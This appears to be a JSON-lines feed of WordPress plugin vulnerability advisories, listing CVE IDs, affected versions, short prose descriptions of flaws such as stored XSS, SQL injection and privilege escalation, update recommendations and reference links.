{"CVE_ID":"CVE-2024-4470","slug":"master-slider","versionImpact":"3.9.9","versionEndExcluding":"3.9.10","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ms_slide_info' shortcode in all versions up to, and including, 3.9.9 due to insufficient input sanitization and output escaping on user supplied 'tag_name' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd59bee7-5de5-406d-8c1b-654306d68ab8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd59bee7-5de5-406d-8c1b-654306d68ab8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.9.9\\\/includes\\\/msp-shortcodes.php#L1078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/tags\\\/3.9.9\\\/includes\\\/msp-shortcodes.php#L1078\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084860\\\/#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084860\\\/#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2297","slug":"profile-builder","versionEndExcluding":"3.9.1","description":"The Profile Builder \u2013 User Profile & User Registration Forms plugin for WordPress is vulnerable to unauthorized password resets  in versions up to, and including 3.9.0. This is due to the plugin using native password reset functionality, with insufficient validation on the password reset function (wppb_front_end_password_recovery). The function uses the plaintext value of a password reset key instead of a hashed value which means it can easily be retrieved and subsequently used. An attacker can leverage CVE-2023-0814, or another vulnerability like SQL Injection in another plugin or theme installed on the site to successfully exploit this vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e731292a-4f95-46eb-889e-b00d58f3444e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e731292a-4f95-46eb-889e-b00d58f3444e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2864329%40profile-builder&new=2864329%40profile-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2864329%40profile-builder&new=2864329%40profile-builder&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/512e7307-04a5-4d8b-8f79-f75f37784a9f\\\/\",\"name\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/512e7307-04a5-4d8b-8f79-f75f37784a9f\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2023\\\/03\\\/vulnerability-patched-in-cozmolabs-profile-builder-plugin-information-disclosure-leads-to-account-takeover\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2023\\\/03\\\/vulnerability-patched-in-cozmolabs-profile-builder-plugin-information-disclosure-leads-to-account-takeover\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2733","slug":"mstore-api","versionEndExcluding":"3.9.1","description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.0. This is due to insufficient verification on the user being supplied during the coupon redemption REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2913397%40mstore-api&old=2910707%40mstore-api&sfp_email=&sfph_mail=#file60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2913397%40mstore-api&old=2910707%40mstore-api&sfp_email=&sfph_mail=#file60\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/3.9.0\\\/controllers\\\/flutter-woo.php#L734\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/3.9.0\\\/controllers\\\/flutter-woo.php#L734\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c726d8f0-7f2a-414b-9d73-a053921074d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c726d8f0-7f2a-414b-9d73-a053921074d9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0814","slug":"profile-builde","versionEndExcluding":"3.9.1","description":"The Profile Builder \u2013 User Profile & User Registration Forms plugin for WordPress is vulnerable to sensitive information disclosure via the [user_meta] shortcode in versions up to, and including 3.9.0. This is due to insufficient restriction on sensitive user meta values that can be called via that shortcode. This makes it possible for authenticated attackers, with subscriber-level permissions, and above to retrieve sensitive user meta that can be used to gain access to a high privileged user account. This does require the Usermeta shortcode be enabled to be exploited.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2864329%40profile-builder&new=2864329%40profile-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2864329%40profile-builder&new=2864329%40profile-builder&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbedad66-a5a6-4fb5-b03e-0ecf9fbef19a\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbedad66-a5a6-4fb5-b03e-0ecf9fbef19a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11769","slug":"flower-delivery-by-florist-one","versionImpact":"3.9","versionEndExcluding":"3.9.1","description":"The Flower Delivery by Florist One plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'flower-delivery' shortcode in all versions up to, and including, 3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201180%40flower-delivery-by-florist-one&new=3201180%40flower-delivery-by-florist-one&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201180%40flower-delivery-by-florist-one&new=3201180%40flower-delivery-by-florist-one&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93efae1f-1e4a-48ee-8a69-558c38925250?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93efae1f-1e4a-48ee-8a69-558c38925250?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13846","slug":"ulp-duplicate-post-sql-timebased","versionImpact":"3.9","versionEndExcluding":"3.9.1","description":"The Indeed Ultimate Learning Pro plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018post_id\u2019 parameter in all versions up to, and including, 3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimate-learning-pro-wordpress-plugin\\\/21772657\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimate-learning-pro-wordpress-plugin\\\/21772657\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9ccd2cc-ee5e-40e3-905d-21884ec01f72?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9ccd2cc-ee5e-40e3-905d-21884ec01f72?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12259","slug":"computer-repair-shop","versionImpact":"3.8120","versionEndExcluding":"3.8122","description":"The CRM WordPress Plugin \u2013 RepairBuddy plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.8120. This is due to the plugin not properly validating a user's identity prior to updating their email through the wc_update_user_data AJAX action. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"Update to version 3.8122, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204501%40computer-repair-shop&new=3204501%40computer-repair-shop&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204501%40computer-repair-shop&new=3204501%40computer-repair-shop&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206568%40computer-repair-shop&new=3206568%40computer-repair-shop&sfp_email=&sfph_mail=#file548\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206568%40computer-repair-shop&new=3206568%40computer-repair-shop&sfp_email=&sfph_mail=#file548\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208270%40computer-repair-shop&new=3208270%40computer-repair-shop&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208270%40computer-repair-shop&new=3208270%40computer-repair-shop&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80997d2f-3e16-48f6-969b-58844cb83d53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80997d2f-3e16-48f6-969b-58844cb83d53?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4266","slug":"metform","versionImpact":"3.8.8","versionEndExcluding":"3.8.9","description":"The MetForm \u2013 Contact Form, Survey, Quiz, & Custom Form Builder for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 3.8.8 via the 'handle_file' function. This can allow unauthenticated attackers to extract sensitive data, such as Personally Identifiable Information, from files uploaded by users.","recommendation":"Update to version 3.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8edb72f5-dda3-4c59-ba7a-7a460cb59c03?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8edb72f5-dda3-4c59-ba7a-7a460cb59c03?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/entries\\\/action.php#L1019\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/entries\\\/action.php#L1019\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099977\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099977\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12112","slug":"easy-form-builder","versionImpact":"3.8.8","versionEndExcluding":"3.8.9","description":"The Easy Form Builder \u2013 WordPress plugin form builder: contact form, survey form, payment form, and custom form builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter of the 'add_form_Emsfb' AJAX action in all versions up to, and including, 3.8.8 due to insufficient input sanitization and output escaping and missing authorization checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3215764\\\/easy-form-builder\\\/trunk\\\/includes\\\/admin\\\/class-Emsfb-create.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3215764\\\/easy-form-builder\\\/trunk\\\/includes\\\/admin\\\/class-Emsfb-create.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a71e72dd-574c-41fc-a000-7a4cf658f3d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a71e72dd-574c-41fc-a000-7a4cf658f3d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2276","slug":"ultimate-dashboard","versionImpact":"3.8.7","versionEndExcluding":"3.8.8","description":"The Ultimate Dashboard \u2013 Custom WordPress Dashboard plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_module_actions function in all versions up to, and including, 3.8.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate\/deactivate plugin modules.","recommendation":"Update to version 3.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-dashboard\\\/tags\\\/3.8.7\\\/modules\\\/feature\\\/class-feature-module.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-dashboard\\\/tags\\\/3.8.7\\\/modules\\\/feature\\\/class-feature-module.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffee6564-2718-4461-b481-cbf0e204a04d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffee6564-2718-4461-b481-cbf0e204a04d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5529","slug":"wp-quicklatex","versionImpact":"3.8.7","versionEndExcluding":"3.8.8","description":"The WP QuickLaTeX WordPress plugin before 3.8.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/66d0b4b7-cd4b-4ec4-95c0-d50773cb0b8f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/66d0b4b7-cd4b-4ec4-95c0-d50773cb0b8f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5874","slug":"ays-popup-box","versionEndExcluding":"3.8.7","description":"The Popup box WordPress plugin before 3.8.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebe3e873-1259-43b9-a027-daa4dbd937f3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebe3e873-1259-43b9-a027-daa4dbd937f3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5809","slug":"ays-popup-box","versionEndExcluding":"3.8.7","description":"The Popup box WordPress plugin before 3.8.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1eb05e8-1b7c-45b1-912d-f668bd68e265\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1eb05e8-1b7c-45b1-912d-f668bd68e265\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5472","slug":"wp-quicklatex","versionImpact":"3.8.6","versionEndExcluding":"3.8.7","description":"The WP QuickLaTeX WordPress plugin before 3.8.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dcddc2de-c32c-4f8c-8490-f3d980b05822\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dcddc2de-c32c-4f8c-8490-f3d980b05822\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10899","slug":"wc-product-table-lite","versionImpact":"3.8.6","versionEndExcluding":"3.8.7","description":"The The WooCommerce Product Table Lite plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.8.6. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. The same 'id' parameter is vulnerable to Reflected Cross-Site Scripting as well.","recommendation":"Update to version 3.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9b010ff-8a4a-4553-bb2b-d58a254d7ee4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9b010ff-8a4a-4553-bb2b-d58a254d7ee4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-product-table-lite\\\/tags\\\/3.8.6\\\/main.php#L1778\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-product-table-lite\\\/tags\\\/3.8.6\\\/main.php#L1778\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3190789%40wc-product-table-lite&new=3190789%40wc-product-table-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3190789%40wc-product-table-lite&new=3190789%40wc-product-table-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6458","slug":"wc-product-table-lite","versionImpact":"3.5.1","versionEndExcluding":"3.8.6","description":"The WooCommerce Product Table Lite plugin for WordPress is vulnerable to unauthorized post title modification due to a missing capability check on the wcpt_presets__duplicate_preset_to_table function in all versions up to, and including, 3.5.1. This makes it possible for authenticated attackers with subscriber access and above to change titles of arbitrary posts. Missing sanitization can lead to Stored Cross-Site Scripting when viewed by an admin via the WooCommerce Product Table.","recommendation":"Update to version 3.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e06fb465-4c72-49a8-af35-ff6d629ff9a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e06fb465-4c72-49a8-af35-ff6d629ff9a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-product-table-lite\\\/trunk\\\/presets\\\/presets.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-product-table-lite\\\/trunk\\\/presets\\\/presets.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3125858%40wc-product-table-lite&new=3125858%40wc-product-table-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3125858%40wc-product-table-lite&new=3125858%40wc-product-table-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1525","slug":"ultimate-dashboard","versionImpact":"3.8.5","versionEndExcluding":"3.8.6","description":"The Ultimate Dashboard  WordPress plugin before 3.8.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d457733f-72e9-45e2-ac07-4e1b94e46102\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d457733f-72e9-45e2-ac07-4e1b94e46102\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1524","slug":"ultimate-dashboard","versionImpact":"3.8.5","versionEndExcluding":"3.8.6","description":"The Ultimate Dashboard  WordPress plugin before 3.8.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36aed1e4-05cb-42d2-b835-f6336f1a82cd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36aed1e4-05cb-42d2-b835-f6336f1a82cd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1523","slug":"ultimate-dashboard","versionImpact":"3.8.5","versionEndExcluding":"3.8.6","description":"The Ultimate Dashboard  WordPress plugin before 3.8.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a20768f-3128-4b0a-a06b-2247f3e02c99\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a20768f-3128-4b0a-a06b-2247f3e02c99\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13818","slug":"pie-register","versionImpact":"3.8.4","versionEndExcluding":"3.8.4.1","description":"The Registration Forms \u2013 User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.8.3.9 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information about users contained in the exposed log files.","recommendation":"Update to version 3.8.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/trunk\\\/classes\\\/base_variables.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/trunk\\\/classes\\\/base_variables.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/768730c1-a70e-432d-a234-4ce2b8aec424?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/768730c1-a70e-432d-a234-4ce2b8aec424?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1585","slug":"metform","versionImpact":"3.8.3","versionEndExcluding":"3.8.4","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/342d6941-6987-4756-b554-1699128b9108?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/342d6941-6987-4756-b554-1699128b9108?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/utils\\\/util.php#L555\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/utils\\\/util.php#L555\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/metform\\\/tags\\\/3.8.3&old=3047398&new_path=\\\/metform\\\/tags\\\/3.8.4&new=3047398&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/metform\\\/tags\\\/3.8.3&old=3047398&new_path=\\\/metform\\\/tags\\\/3.8.4&new=3047398&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3593","slug":"ubermenu","versionImpact":"3.8.3","versionEndExcluding":"3.8.4","description":"The UberMenu plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.8.3. This is due to missing or incorrect nonce validation on the ubermenu_delete_all_item_settings and ubermenu_reset_settings functions. This makes it possible for unauthenticated attackers to delete and reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/621ef583-bf99-4b81-ae9c-b4f1c86b86aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/621ef583-bf99-4b81-ae9c-b4f1c86b86aa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ubermenu-wordpress-mega-menu-plugin\\\/154703\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ubermenu-wordpress-mega-menu-plugin\\\/154703\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12264","slug":"payu-india","versionImpact":"3.8.3","versionEndExcluding":"3.8.4","description":"The PayU CommercePro Plugin plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.8.3. This is due to \/wp-json\/payu\/v1\/generate-user-token and \/wp-json\/payu\/v1\/get-shipping-cost  REST API endpoints not properly verifying a user's identity prior to setting the users ID and auth cookies. This makes it possible for unauthenticated attackers to create new administrative user accounts.","recommendation":"Update to version 3.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payu-india\\\/tags\\\/3.8.3\\\/includes\\\/class-payu-shipping-tax-api-calculation.php#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payu-india\\\/tags\\\/3.8.3\\\/includes\\\/class-payu-shipping-tax-api-calculation.php#L187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf037e4a-2dd7-4296-b86b-635901d2d68f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf037e4a-2dd7-4296-b86b-635901d2d68f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
